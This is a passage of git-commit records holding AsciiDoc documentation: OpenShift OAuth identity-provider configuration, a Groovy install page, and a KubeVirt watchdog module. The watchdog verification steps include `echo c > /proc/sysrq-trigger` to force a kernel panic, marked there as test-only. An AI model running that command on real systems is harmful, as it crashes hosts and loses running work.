sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== Deny All [[DenyAllPasswordIdentityProvider]]\n\n`DenyAllPasswordIdentityProvider` denies all username and passwords.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_deny_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: DenyAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== HTPasswd [[HTPasswdPasswordIdentityProvider]]\n\n`HTPasswdPasswordIdentityProvider` validates logins and passwords against a flat-file generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd]\n\n* Only MD5 and SHA encryption types are supported. MD5 encryption is recommended, and is the default for htpasswd. Plaintext, crypt, and bcrypt hashes are not currently supported.\n* The file is re-read if its modification time changes, without requiring a server restart\n* To create the file: `htpasswd -c <\/path\/to\/users.htpasswd> <login>`\n* To add or update a login to the file: `htpasswd <\/path\/to\/users.htpasswd> <login>`\n* To remove a login from the file: `htpasswd <\/path\/to\/users.htpasswd> -D <login>`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_htpasswd_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: HTPasswdPasswordIdentityProvider\n file: \/path\/to\/users.htpasswd <4>\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> File generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd].\n====\n\n==== Basic-Auth (remote) [[BasicAuthPasswordIdentityProvider]]\n\n`BasicAuthPasswordIdentityProvider` validates logins and passwords against a remote server using a server-to-server basic-auth request.\n\n* Logins and passwords are validated against a basic-auth protected, JSON-returning remote URL\n* A 401 response indicates failed auth.\n* A non-200 status, or the presence of a non-empty \"error\" key, indicates an error: `{\"error\":\"Error message\"}`\n* A 200 status with an \"id\" key indicates success: `{\"id\":\"userid\"}`\n** The id must be unique to the authenticated user\n** The id must not be able to be modified\n* A successful response may optionally provide additional data:\n** Display name. Example: `{\"id\":\"userid\", \"name\": \"User Name\", ...}`\n** Email address. Example: `{\"id\":\"userid\", \"email\":\"user@example.com\", ...}`\n** Preferred login. This is useful when the unique, unchangeable user id is a database key or UID, and a more human-readable name exists. This is used as a hint when provisioning the OpenShift user for the authenticated identity. Example: `{\"id\":\"014fbff9a07c\", \"login\":\"bob\", ...}`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_remote_basic_auth_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: BasicAuthPasswordIdentityProvider\n url: https:\/\/www.example.com\/remote-idp <4>\n ca: \/path\/to\/ca.file <5>\n certFile: \/path\/to\/client.crt <6>\n keyFile: \/path\/to\/client.key <7>\n----\n<1> This provider name is prefixed to the returned user id to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> URL accepting credentials in basic-auth headers.\n<5> Certificate bundle to use to validate server certificates for the configured URL. Optional.\n<6> Client certificate to present when making requests to the configured URL. Optional.\n<7> Key for the client certificate. Required if `certFile` is specified.\n====\n\n==== Request Header [[RequestHeaderIdentityProvider]]\n\n`RequestHeaderIdentityProvider` identifies users from request header values, like `X-Remote-User`. It is typically used in combination with an authenticating proxy, which sets the request header value.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_request_header_provider <1>\n challenge: false <2>\n login: false <3>\n provider:\n apiVersion: v1\n kind: RequestHeaderIdentityProvider\n clientCA: \/path\/to\/client-ca.file <4>\n headers: <5>\n - X-Remote-User\n - SSO-User\n----\n<1> This provider name is prefixed to the user id in the request header to form an identity name.\n<2> `RequestHeaderIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> `RequestHeaderIdentityProvider` cannot be used to back a login page.\n<4> PEM-encoded certificate bundle. If set, a valid client certificate must be presented and validated against the certificate authorities in the specified file before the request headers are checked for usernames. Optional.\n<5> Header names to check, in order, for user ids. The first header containing a value is used as the user id. Required, case-insensitive.\n====\n\n==== GitHub [[GitHub]]\n\n`GitHubIdentityProvider` uses GitHub as an identity provider, using the OAuth integration.\n\nNote that using GitHub as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: github <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GitHubIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the GitHub numeric user id to form an identity name. It is also used to build the callback URL.\n<2> `GitHubIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to GitHub to log in.\n<4> The client id of a link:https:\/\/github.com\/settings\/applications\/new[registered GitHub OAuth application]. The application must be configured with a callback URL of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by GitHub.\n====\n\n==== Google [[Google]]\n\n`GoogleIdentityProvider` uses Google as an identity provider, using Google's OpenID Connect integration.\n\nSee https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect for more information.\n\nNote that using Google as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: google <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GoogleIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the Google numeric user id to form an identity name. It is also used to build the redirect URL.\n<2> `GoogleIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to Google to log in.\n<4> The client id of a link:https:\/\/console.developers.google.com\/[registered Google project]. The project must be configured with a redirect URI of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by Google.\n====\n\n==== OpenID Connect [[OpenID]]\n\n`OpenIDIdentityProvider` integrates with an OpenID Connect identity provider, using an link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#CodeFlowAuth[Authorization Code Flow].\n\nID Token and UserInfo decryption is not supported.\n\nBy default, the `openid` scope is requested. Extra scopes (if needed) can be specified in the `extraScopes` config field.\n\nClaims are read from the JWT `id_token` returned from the OpenID identity provider (and from the JSON returned by the `UserInfo` URL, if specified).\n\nAt least one claim must be configured as the claim to use as the user's identity. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard identity claim] is `sub`.\n\nYou can also indicate which claims to use as the user's preferred username, display name, and email address. If multiple claims are specified, the first one with a non-empty value is used. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard claims] are:\n\n* `sub` (used as the user identity)\n* `preferred_username` (used as the preferred user name when provisioning a user)\n* `email` (email address)\n* `name` (display name)\n\nNote that using an OpenID Connect identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nStandard config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n claims:\n id:\n - sub <6>\n preferredUsername:\n - preferred_username\n name:\n - name\n email:\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize <7>\n token: https:\/\/myidp.example.com\/oauth2\/token <8>\n----\n<1> This provider name is prefixed to the value of the identity claim to form an identity name. It is also used to build the redirect URL.\n<2> `OpenIDIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to the authorize URL to log in.\n<4> The client id of a client registered with the OpenID provider. The client must be allowed to redirect to `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret.\n<6> Use the value of the `sub` claim in the returned `id_token` as the user's identity.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#AuthorizationEndpoint[Authorization Endpoint] described in the OpenID spec. Must use https.\n<8> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#TokenEndpoint[Token Endpoint] described in the OpenID spec. Must use https.\n====\n\nA custom certificate bundle, extra scopes, and UserInfo URL can also be specified.\n\nFull config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect\n challenge: false\n login: true\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ...\n clientSecret: ...\n ca: my-openid-ca-bundle.crt <1>\n extraScopes: <2>\n - email\n - profile\n claims:\n id: <3>\n - custom_id_claim\n - sub\n preferredUsername: <4>\n - preferred_username\n - email\n name: <5>\n - nickname\n - given_name\n - name\n email: <6>\n - custom_email_claim\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize\n token: https:\/\/myidp.example.com\/oauth2\/token\n userInfo: https:\/\/myidp.example.com\/oauth2\/userinfo <7>\n----\n<1> Certificate bundle to use to validate server certificates for the configured URLs. If empty, system trusted roots are used.\n<2> List of scopes to request (in addition to the `openid` scope) during the authorization request.\n<3> List of claims to use as the identity. First non-empty claim is used. At least one claim is required. If none of the listed claims have a value, authentication will fail.\n<4> List of claims to use as the preferred username when provisioning a user for this identity. First non-empty claim is used.\n<5> List of claims to use as the display name. First non-empty claim is used.\n<6> List of claims to use as the email address. First non-empty claim is used.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[UserInfo Endpoint] described in the OpenID spec. Must use https.\n====\n\n=== Token options\n\nThe OAuth server generates two kinds of tokens. \n\nAuthorize codes are short-lived tokens whose only use is to be exchanged for an access token. Set `authorizeTokenMaxAgeSeconds` to control the lifetime of authorize codes. The default lifetime is 5 minutes.\n\nAccess tokens are longer-lived tokens that grant access to the API. Set `accessTokenMaxAgeSeconds` to control the lifetime of access tokens. The default lifetime is 1 hour.\n\nMaster config:\n----\noauthConfig:\n ...\n tokenConfig:\n accessTokenMaxAgeSeconds: 3600\n authorizeTokenMaxAgeSeconds: 300\n----\n\n=== Grant options\n\nTo configure how the OAuth server responds to token requests for a client the user has not previously granted permission, set the `method` value in the `grantConfig` stanza. Valid values are:\n\n* `auto`\n** Auto-approve the grant and retry the request\n* `prompt`\n** Prompt the user to approve or deny the grant\n* `deny`\n** Auto-deny the grant and return a failure error to the client\n\nMaster config:\n----\noauthConfig:\n ...\n grantConfig:\n method: auto\n----\n\n=== Session options\n\nThe OAuth server uses a signed and encrypted cookie-based session during login and redirect flows.\n\nIf no `sessionSecretsFile` is specified, a random signing and encryption secret is generated at each start of the master server. This means that any logins in progress will have their sessions invalidated if the master is restarted. It also means that if multiple masters are configured, they will not be able to decode sessions generated by one of the other masters.\n\nTo specify the signing and encryption secret to use, specify a `sessionSecretsFile`. This allows you separate secret values from the config file, and keep the config file distributable for debugging, etc.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n sessionConfig:\n sessionMaxAgeSeconds: 300 <1>\n sessionName: ssn <2>\n sessionSecretsFile: \"...\" <3>\n----\n<1> Controls the maximum age of a session (sessions auto-expire once a token request is complete). If auto-grant is not enabled, sessions must last as long as the user is expected to take to approve or reject a client authorization request.\n<2> Name of the cookie used to store the session.\n<3> Filename containing serialized SessionSecrets object. If empty, a random signing and encryption secret is generated at each server start.\n====\n\nMultiple secrets can be specified in the `sessionSecretsFile` to enable rotation. New sessions are signed and encrypted using the first secret in the list. Existing sessions are decrypted\/authenticated by each secret until one succeeds.\n\nSession secret config:\n====\n----\napiVersion: v1\nkind: SessionSecrets\nsecrets: <1>\n- authentication: \"...\" <2>\n encryption: \"...\" <3>\n- authentication: \"...\"\n encryption: \"...\"\n...\n----\n<1> List of secrets used to authenticate and encrypt cookie sessions. At least one secret must be specified. Each secret must set an authentication and encryption secret.\n<2> Signing secret, used to authenticate sessions using HMAC. Recommended to use a secret with 32 or 64 bytes.\n<3> Encrypting secret, used to encrypt sessions. Must be 16, 24, or 32 characters long, to select AES-128, AES-192, or AES-256.\n====","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b00999deed40d22b78472a28b41a17808d98afdf","subject":"Docs ServerRSocketFactoryCustomizer->ServerRSocketFactoryProcessor","message":"Docs ServerRSocketFactoryCustomizer->ServerRSocketFactoryProcessor\n\nThe documentation incorrectly used ServerRSocketFactoryCustomizer which\nwas renamed to ServerRSocketFactoryProcessor. The docs now use the correct\nclass name\n\nFixes gh-7737\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/reactive\/rsocket.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/reactive\/rsocket.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91a56b1f5961fab17d58ba45d131235223903a05","subject":"code updates","message":"code updates\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/virt-defining-a-watchdog.adoc","new_file":"modules\/virt-defining-a-watchdog.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * virt\/virtual_machines\/advanced_vm_management\/virt-configuring-a-watchdog.adoc\n\n[id=\"virt-defining-a-watchdog\"]\n= Defining a watchdog device\n\nDefine how the watchdog proceeds when the operating system (OS) no longer responds.\n\n.Available actions\n[horizontal]\n`poweroff`:: The virtual machine (VM) powers down immediately.\n`reset`:: The VM reboots in place and the guest OS cannot react. Because the length of time required for the guest OS to reboot can cause liveness probes to timeout, use of this option is discouraged. This timeout can extend the time it takes the VM to reboot if cluster-level protections notice the liveness probe failed and forcibly reschedule it.\n`shutdown`:: The VM gracefully powers down by stopping all services.\n\n\n.Procedure\n\n. Create a YAML file with the following contents:\n\n+\n[source,yaml]\n----\napiVersion: kubevirt.io\/v1\nkind: VirtualMachine\nmetadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n name: <vm-name>\nspec:\n running: false\n template:\n metadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n spec:\n domain:\n devices:\n watchdog:\n name: <watchdog>\n i6300esb:\n action: \"poweroff\" <1>\n...\n----\n<1> Specify the `watchdog` action (`poweroff`, `reset`, or `shutdown`).\n\n+\nThe example above configures the `i6300esb` watchdog device on a RHEL8 VM with the poweroff action and exposes the device as `\/dev\/watchdog`.\n+\nThis device can now be used by the watchdog binary.\n\n. Apply the YAML file to your cluster by running the following command:\n\n+\n[source,yaml]\n----\n$ oc apply -f <file_name>.yaml\n----\n\n.Verification\n\n--\n[IMPORTANT]\n====\nThis procedure is provided for testing watchdog functionality only and must not be run on production machines.\n====\n--\n\n. Run the following command to verify that the VM is connected to the watchdog device:\n\n+\n[source,terminal]\n----\n$ lspci | grep watchdog -i\n----\n\n. Run one of the following commands to confirm the watchdog is active:\n\n\n* Trigger a kernel panic:\n+\n[source,terminal]\n----\n# echo c > \/proc\/sysrq-trigger\n----\n\n* Terminate the watchdog service:\n+\n[source,terminal]\n----\n# pkill -9 watchdog\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * virt\/virtual_machines\/advanced_vm_management\/virt-configuring-a-watchdog.adoc\n\n[id=\"virt-defining-a-watchdog\"]\n= Defining a watchdog device\n\nDefine how the watchdog proceeds when the operating system (OS) no longer responds.\n\n.Available actions\n[horizontal]\n`poweroff`:: The virtual machine (VM) powers down immediately.\n`reset`:: The VM reboots in place and the guest OS cannot react. Because the length of time required for the guest OS to reboot can cause liveness probes to timeout, use of this option is discouraged. This timeout can extend the time it takes the VM to reboot if cluster-level protections notice the liveness probe failed and forcibly reschedule it.\n`shutdown`:: The VM gracefully powers down by stopping all services.\n\n\n.Procedure\n\n. Create a YAML file with the following contents:\n\n+\n[source,yaml]\n----\napiVersion: kubevirt.io\/v1\nkind: VirtualMachine\nmetadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n name: <vm-name>\nspec:\n running: false\n template:\n metadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n spec:\n domain:\n devices:\n watchdog:\n name: <watchdog>\n i6300esb:\n action: \"poweroff\" <1>\n...\n----\n<1> Specify the `watchdog` action (`poweroff`, `reset`, or `shutdown`).\n\n+\nThe example above configures the `i6300esb` watchdog device on a RHEL8 VM with the poweroff action and exposes the device as `\/dev\/watchdog`.\n+\nThis device can now be used by the watchdog binary.\n\n. Apply the YAML file to your cluster by running the following command:\n\n+\n[source,yaml]\n----\n$ oc apply -f <file_name>.yaml\n----\n\n.Verification\n\n--\n[IMPORTANT]\n====\nThis procedure is provided for testing watchdog functionality only and must not be run on production machines.\n====\n--\n\n. Run the following command to verify that the VM is connected to the watchdog device:\n\n+\n[source,terminal]\n----\n$ lspci | grep watchdog -i\n----\n\n. Run one of the following commands to confirm the watchdog is active:\n\n\n* Trigger a kernel panic:\n+\n[source,terminal]\n----\n$ echo c > \/proc\/sysrq-trigger\n----\n\n* Terminate the watchdog service:\n+\n[source,terminal]\n----\n$ kill -9 pgrep watchdog\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f6b2690a99e4a3fd402e56d06a31213ef28159f","subject":"Title \"IDE plugin\" changed. Typo fix.","message":"Title \"IDE plugin\" changed. Typo fix.\n","repos":"gillius\/incubator-groovy,paulk-asert\/groovy,kenzanmedia\/incubator-groovy,genqiang\/incubator-groovy,kenzanmedia\/incubator-groovy,paulk-asert\/groovy,guangying945\/incubator-groovy,adjohnson916\/incubator-groovy,adjohnson916\/groovy-core,adjohnson916\/incubator-groovy,groovy\/groovy-core,armsargis\/groovy,eginez\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,pledbrook\/incubator-groovy,samanalysis\/incubator-groovy,ChanJLee\/incubator-groovy,sagarsane\/groovy-core,EPadronU\/incubator-groovy,eginez\/incubator-groovy,armsargis\/groovy,bsideup\/incubator-groovy,jwagenleitner\/incubator-groovy,rlovtangen\/groovy-core,alien11689\/groovy-core,antoaravinth\/incubator-groovy,paulk-asert\/groovy,antoaravinth\/incubator-groovy,ebourg\/groovy-core,rabbitcount\/incubator-groovy,kidaa\/incubator-groovy,shils\/groovy,tkruse\/incubator-groovy,rlovtangen\/groovy-core,PascalSchumacher\/incubator-groovy,genqiang\/incubator-groovy,graemerocher\/incubator-groovy,antoaravinth\/incubator-groovy,shils\/incubator-groovy,aaronzirbes\/incubator-groovy,sagarsane\/incubator-groovy,nkhuyu\/incubator-groovy,dpolivaev\/groovy,ebourg\/groovy-core,apache\/groovy,dpolivaev\/groovy,paulk-asert\/incubator-groovy,sagarsane\/incubator-groovy,alien11689\/groovy-core,alien11689\/incubator-groovy,rabbitcount\/incubator-groovy,tkruse\/incubator-groovy,avafanasiev\/groovy,upadhyayap\/incubator-groovy,sagarsane\/groovy-core,aaronzirbes\/incubator-groovy,sagarsane\/groovy-core,ebourg\/incubator-groovy,nkhuyu\/incubator-groovy,EPadronU\/incubator-groovy,fpavageau\/groovy,pickypg\/incubator-groovy,gillius\/incubator-groovy,christoph-frick\/groovy-core,mariogarcia\/groovy-core,paulk-asert\/groovy,upadhyayap\/incubator-groovy,paplorinc\/incubator-groovy,jwagenleitner\/groovy,bsideup\/incubator-groovy,upadhyayap\/incubator-groovy,PascalSchumacher\/incubator-groovy,fpavageau\/groovy,paulk-asert\/incubator-groovy,mariogarcia\/groovy-core,avafanasiev\/groovy,aim-for-better\/incubator-groovy,traneHead\/groovy-core,shils\/incubator-groovy,groovy\/groovy-core,bsideup\/groovy-core,taoguan\/incubator-groovy,guangying945\/incubator-groovy,ChanJLee\/incubator-groovy,mariogarcia\/groovy-core,ebourg\/incubator-groovy,kidaa\/incubator-groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,avafanasiev\/groovy,nobeans\/incubator-groovy,nobeans\/incubator-groovy,bsideup\/groovy-core,kidaa\/incubator-groovy,EPadronU\/incubator-groovy,aim-for-better\/incubator-groovy,rlovtangen\/groovy-core,groovy\/groovy-core,aim-for-better\/incubator-groovy,pledbrook\/incubator-groovy,kidaa\/incubator-groovy,kenzanmedia\/incubator-groovy,taoguan\/incubator-groovy,alien11689\/groovy-core,genqiang\/incubator-groovy,christoph-frick\/groovy-core,russel\/groovy,ChanJLee\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/incubator-groovy,russel\/groovy,PascalSchumacher\/incubator-groovy,sagarsane\/incubator-groovy,armsargis\/groovy,apache\/incubator-groovy,ebourg\/incubator-groovy,alien11689\/groovy-core,taoguan\/incubator-groovy,apache\/groovy,jwagenleitner\/incubator-groovy,nkhuyu\/incubator-groovy,ebourg\/groovy-core,yukangguo\/incubator-groovy,fpavageau\/groovy,shils\/groovy,adjohnson916\/incubator-groovy,PascalSchumacher\/incubator-groovy,yukangguo\/incubator-groovy,PascalSchumacher\/incubator-groovy,ebourg\/groovy-core,graemerocher\/incubator-groovy,apache\/incubator-groovy,apache\/incubator-groovy,rlovtangen\/groovy-core,tkruse\/incubator-groovy,paplorinc\/incubator-groovy,guangying945\/incubator-groovy,samanalysis\/incubator-groovy,pickypg\/incubator-groovy,rlovtangen\/groovy-core,russel\/incubator-groovy,mariogarcia\/groovy-core,pledbrook\/incubator-groovy,nkhuyu\/incubator-groovy,gillius\/incubator-groovy,samanalysis\/incubator-groovy,adjohnson916\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/incubator-groovy,sagarsane\/groovy-core,graemerocher\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,armsargis\/groovy,russel\/incubator-groovy,upadhyayap\/incubator-groovy,groovy\/groovy-core,nobeans\/incubator-groovy,rabbitcount\/incubator-groovy,pledbrook\/incubator-groovy,EPadronU\/incubator-groovy,apache\/groovy,alien11689\/incubator-groovy,aaronzirbes\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/incubator-groovy,eginez\/incubator-groovy,ebourg\/incubator-groovy,bsideup\/incubator-groovy,antoaravinth\/incubator-groovy,russel\/groovy,jwagenleitner\/groovy,adjohnson916\/groovy-core,traneHead\/groovy-core,ChanJLee\/incubator-groovy,yukangguo\/incubator-groovy,aim-for-better\/incubator-groovy,alien11689\/incubator-groovy,russel\/groovy,genqiang\/incubator-groovy,sagarsane\/incubator-groovy,graemerocher\/incubator-groovy,gillius\/incubator-groovy,groovy\/groovy-core,paplorinc\/incubator-groovy,kenzanmedia\/incubator-groovy,ebourg\/groovy-core,apache\/incubator-groovy,dpolivaev\/groovy,adjohnson916\/groovy-core,i55ac\/incubator-groovy,christoph-frick\/groovy-core,guangying945\/incubator-groovy,i55ac\/incubator-groovy,jwagenleitner\/groovy,jwagenleitner\/incubator-groovy,paplorinc\/incubator-groovy,shils\/groovy,pickypg\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,adjohnson916\/groovy-core,aaronzirbes\/incubator-groovy,yukangguo\/incubator-groovy,sagarsane\/groovy-core,christoph-frick\/groovy-core,fpavageau\/groovy,shils\/groovy,russel\/incubator-groovy,nobeans\/incubator-groovy,dpolivaev\/groovy,shils\/incubator-groovy,rabbitcount\/incubator-groovy,i55ac\/incubator-groovy,alien11689\/groovy-core,bsideup\/groovy-core,pickypg\/incubator-groovy,russel\/incubator-groovy,taoguan\/incubator-groovy,bsideup\/groovy-core,adjohnson916\/groovy-core,mariogarcia\/groovy-core,tkruse\/incubator-groovy,samanalysis\/incubator-groovy","old_file":"src\/spec\/doc\/core-getting-started.adoc","new_file":"src\/spec\/doc\/core-getting-started.adoc","new_contents":"= Getting started\n:toc:\n:icons: font\n:linkcss!:\n\n== Download\n\nIn this download area, you will be able to download the distribution (binary and source), the Windows installer (for some of the versions) and the documentation for **Groovy**.\n\nFor a quick and effortless start on Mac OSX, Linux or Cygwin, you can use link:http:\/\/gvmtool.net[GVM] (the Groovy enVironment Manager) to download and configure any **Groovy** version of your choice. Basic (TODO)[instructions] can be found below.\n\n=== Groovy 2.1\n\n==== Groovy 2.1.6\n\n==== Groovy 2.1.5\n\n=== Groovy 2.2\n\n==== Groovy 2.2.0-beta-1\n\n=== Groovy 2.0\n\n==== Groovy 2.0.8\n\n=== Groovy 1.8 (Maintenance Release)\n\n==== Groovy 1.8.9\n\n=== Snapshots\n\n=== Older Releases\n\n==== Groovy 1.7.11\n\n==== Groovy 1.6.9\n\n==== Groovy 1.5.8\n\n=== Legacy Groovy 1.0\n\n\n== Maven Repositories\n\n=== Groovy 2.0.X and newer\n\n=== Groovy 1.6.X - 1.8.X\n\n=== Groovy 1.1.X - 1.5.X\n\n=== Groovy 1.0\n\n=== Snapshot Releases\n\n\n== GVM (the Groovy enVironment Manager)\n\n\n== Other ways to get Groovy\n\n=== Installation on Mac OS X\n\n==== MacPorts\n\nSet up link:http:\/\/www.macports.org[MacPorts] and type in the Terminal:\n\n[source,shell]\n----\nsudo port install groovy\n----\n\n==== Homebrew\n\n=== Installation on Windows\n\n=== Other Distributions\n\n=== Source Code\n\n=== IDE plugin\n\n\n== Install Binary\n\nThese instructions describe how to install a binary distribution of **Groovy**.\n\n* First, link:#download-groovy[Download] a binary distribution of Groovy and unpack it into some file on your local file system.\n* Set your ++GROOVY_HOME++ environment variable to the directory you unpacked the distribution.\n* Add ++GROOVY_HOME\/bin++ to your ++PATH++ environment variable.\n* Set your ++JAVA_HOME++ environment variable to point to your JDK. On OS X this is ++\/Library\/Java\/Home++, on other unixes its often ++\/usr\/java++ etc. If you've already installed tools like Ant or Maven you've probably already done this step.\n\nYou should now have Groovy installed properly. You can test this by typing the following in a command shell:\n\n[source,shell]\n----\ngroovysh\n----\n\nWhich should create an interactive groovy shell where you can type Groovy statements. Or to run the link:tools\/tools-groovyconsole.html[Swing interactive console] type:\n\n[source,shell]\n----\ngroovyConsole\n----\n\nTo run a specific Groovy script type:\n\n[source,shell]\n----\ngroovy SomeScript.groovy\n----\n","old_contents":"= Getting started\n:toc:\n:icons: font\n:linkcss!:\n\n== Download\n\nIn this download area, you will be able to download the distribution (binary and source), the Windows installer (for some of the versions) and the documentation for **Groovy**.\n\nFor a quick and effortless start on Mac OSX, Linux or Cygwin, you can use link:http:\/\/gvmtool.net[GVM] (the Groovy enVironment Manager) to download and configure any **Groovy** version of your choice. Basic (TODO)[instructions] can be found below.\n\n=== Groovy 2.1\n\n==== Groovy 2.1.6\n\n==== Groovy 2.1.5\n\n=== Groovy 2.2\n\n==== Groovy 2.2.0-beta-1\n\n=== Groovy 2.0\n\n==== Groovy 2.0.8\n\n=== Groovy 1.8 (Maintenance Release)\n\n==== Groovy 1.8.9\n\n=== Snapshots\n\n=== Older Releases\n\n==== Groovy 1.7.11\n\n==== Groovy 1.6.9\n\n==== Groovy 1.5.8\n\n=== Legacy Groovy 1.0\n\n\n== Maven Repositories\n\n=== Groovy 2.0.X and newer\n\n=== Groovy 1.6.X - 1.8.X\n\n=== Groovy 1.1.X - 1.5.X\n\n=== Groovy 1.0\n\n=== Snapshot Releases\n\n\n== GVM (the Groovy enVironment Manager)\n\n\n== Other ways to get Groovy\n\n=== Installation on Mac OS X\n\n==== MacPorts\n\nSet up link:http:\/\/www.macports.org[MacPorts] and type in the Terminal:\n\n[source,shell]\n----\nsudo port install groovy\n----\n\n==== Homebrew\n\n=== Installation on Windows\n\n=== Other Distributions\n\n=== Source Code\n\n== IDE plugin\n\n\n== Install Binary\n\nThese instructions describe how to install a binary distribution of **Groovy**.\n\n* First, link:#download-groovy[Download] a binary distribution of Groovy and unpack it into some file on your local file system.\n* Set your ++GROOVY_HOME++ environment variable to the directory you unpacked the distribution.\n* Add ++GROOVY_HOME\/bin++ to your ++PATH++ environment variable.\n* Set your ++JAVA_HOME++ environment variable to point to your JDK. On OS X this is ++\/Library\/Java\/Home++, on other unixes its often ++\/usr\/java++ etc. If you've already installed tools like Ant or Maven you've probably already done this step.\n\nYou should now have Groovy installed properly. You can test this by typing the following in a command shell:\n\n[source,shell]\n----\ngroovysh\n----\n\nWhich should create an interactive groovy shell where you can type Groovy statements. Or to run the link:tools\/tools-groovyconsole.html[Swing interactive console] type:\n\n[source,shell]\n----\ngroovyConsole\n----\n\nTo run a specific Groovy script type:\n\n[source,shell]\n----\ngroovy SomeScript.groovy\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e93616d0859b3ee4ebf856c57b25508ea680921e","subject":"vscode","message":"vscode\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-04\/04-tech-lab-v3.adoc","new_file":"Lab-04\/04-tech-lab-v3.adoc","new_contents":"= Tech lab 04 (version 3)\n\n== Overall goal \n\nTrack, with Github, Microsoft Azure and possibly ServiceNow, the course material on a technical level.\n\n== Section II priorities: it's all about the team. \n\n. Recommended editor: VSCode\n\n. Figure out public\/private key for Github. 